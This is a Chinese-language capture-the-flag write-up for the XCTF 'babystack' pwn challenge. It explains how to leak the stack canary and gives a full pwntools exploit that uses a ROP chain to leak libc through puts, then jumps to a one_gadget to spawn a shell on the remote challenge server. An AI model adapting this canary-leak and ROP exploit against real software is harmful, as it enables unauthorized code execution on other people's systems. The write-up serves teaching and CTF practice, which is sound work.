（攻防世界）（pwn）pwn1(厦门邀请赛）babystack

canary！canary！canary！

拿到题目，下载附件，查看保护。

可以很清楚的看到，程序开了canary，这就说明我们不能实现暴力的栈溢出，还要考虑这个canary的值。

我们首先运行一下程序：

可以很清楚的看出程序的功能，当我们选择1时，我们就可以输入，当我们选择2时，我们可以输出我们前面输入的东西。
进入IDA看源代码：

我们可以看到canary的值存放在v6里，v6距离rbp8h，而我们输入的值距离rbp90h，故，我们可以输入0x88h个字符把canary带出来。

我们发现，输入136个字符后，再输出时会出现换行后带出来一段字符，没错，你没有猜错，这就是canary。
我们就可以得到canary了。然后就可以进行通常的栈溢出了。
这里我们使用one_gadget，当然也可以使用普通泄露地址（反正都要泄露）

到这里，canary也就出来了，接下来的工作也就不详细介绍了，下面给出完整exp：

#!/usr/bin/env python
from pwn import *
elf=ELF('./babystack')
libc=ELF('./libc-2.23.so')
p=remote('111.198.29.45',52070)
prdi_addr=0x0400a93
main_addr=0x0400908
one_gadget_addr=0x45216
put_plt=elf.plt['puts']
put_got=elf.got['puts']
p.sendlineafter('>> ','1')
p.sendline('a'*0x88)
p.sendlineafter('>> ','2')
p.recvuntil('a'*0x88+'\n')
canary=u64(p.recv(7).rjust(8,'\x00'))
print hex(canary)
p.sendlineafter('>> ','1')
payload='a'*0x88+p64(canary)+'a'*8+p64(prdi_addr)+p64(put_got)+p64(put_plt)+p64(main_addr)
p.sendline(payload)
p.recv()
p.sendlineafter('>> ','3')
put_addr=u64(p.recv(8).ljust(8,'\x00'))
print hex(put_addr)
libc_base=put_addr-libc.symbols['puts']
flag=libc_base+one_gadget_addr
p.sendlineafter('>> ','1')
payload1='a'*0x88+p64(canary)+'a'*8+p64(flag)
p.sendline(payload1)
p.sendlineafter('>> ','3')
p.interactive()